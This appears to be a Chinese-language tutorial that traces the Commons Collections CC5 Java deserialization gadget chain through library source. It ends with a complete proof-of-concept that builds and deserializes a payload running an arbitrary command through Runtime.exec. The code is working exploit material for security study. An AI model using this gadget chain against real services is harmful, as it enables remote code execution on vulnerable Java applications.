Java反序列化CC5链

0x01链子分析

CC5的话其实就是在CC1的入口类上做了一点改动,从CC1中利用AnnotationInvocationHandler#readObject()换成利用BadAttributeValueExpException#readObject()

后半段也是沿用了CC1的LazyMap#get()后半段

然后我们来看一下

0x02版本

jdk:jdk8u65
CC:Commons-Collections 3.2.1

0x03链子寻找

那我们继续倒推,找一下能调用get的方法

TiedMapEntry#getValue()

发现TiedMapEntry类中的getValue方法调用了get方法

1
2
3
public Object getValue() {
return map.get(key);
}

TiedMapEntry#toString()

然后TiedMapEntry类的toString方法又调用了getValue方法

1
2
3
public String toString() {
return getKey() + "=" + getValue();
}

BadAttributeValueExpException#readObject()

往前推,发现在BadAttributeValueExpException的readObject方法调用了toString方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
ObjectInputStream.GetField gf = ois.readFields();
Object valObj = gf.get("val", null);

if (valObj == null) {
val = null;
} else if (valObj instanceof String) {
val= valObj;
} else if (System.getSecurityManager() == null
|| valObj instanceof Long
|| valObj instanceof Integer
|| valObj instanceof Float
|| valObj instanceof Double
|| valObj instanceof Byte
|| valObj instanceof Short
|| valObj instanceof Boolean) {
val = valObj.toString();
} else { // the serialized object is from a version without JDK-8019292 fix
val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
}
}

我们看看这里的valObj参数是否可控

1
2
ObjectInputStream.GetField gf = ois.readFields();
Object valObj = gf.get("val", null);

先调用readFields从流中读取了所有的持久化字段,然后调用get()方法得到了名字是val的字段。

1
private Object val;

所以我们只要val变量可控那valObj就是可控的

同时我们看一下该类是否接入序列化接口

1
2
3
public class BadAttributeValueExpException extends Exception  
public class Exception extends Throwable
public class Throwable implements Serializable

根据这里的继承关系可以发现是接入了序列化接口的

0x04POC编写

看一下构造方法

1
2
3
public BadAttributeValueExpException (Object val) {
this.val = val == null ? null : val.toString();
}

我发现这里也会调用toString()方法,所以这里也会触发,那可能会导致反序列化的时候不会触发,那我们用之前的方法,先在给BadAttributeValueExpException传参数的时候不传入tiedMapEntry对象,然后反射修改val的值为tiedMapEntry就行。

构造函数是公共属性,那我们直接写一下poc

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
package POC.CC5;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC5 {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

HashMap<Object,Object> map = new HashMap<>();
Map<Object,Object> lazyMap = LazyMap.decorate(map,chainedTransformer);

//CC5的开头
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
//反射修改val为tiedMapEntry
Class a = Class.forName("javax.management.BadAttributeValueExpException");
Field valfield = a.getDeclaredField("val");
valfield.setAccessible(true);
valfield.set(badAttributeValueExpException,tiedMapEntry);

//序列化和反序列化
serialize(badAttributeValueExpException);
unserialize("CC5.txt");
}
//定义序列化操作
public static void serialize(Object object) throws Exception{
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("CC5.txt"));
oos.writeObject(object);
oos.close();
}

//定义反序列化操作
public static void unserialize(String filename) throws Exception{
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
ois.readObject();
}
}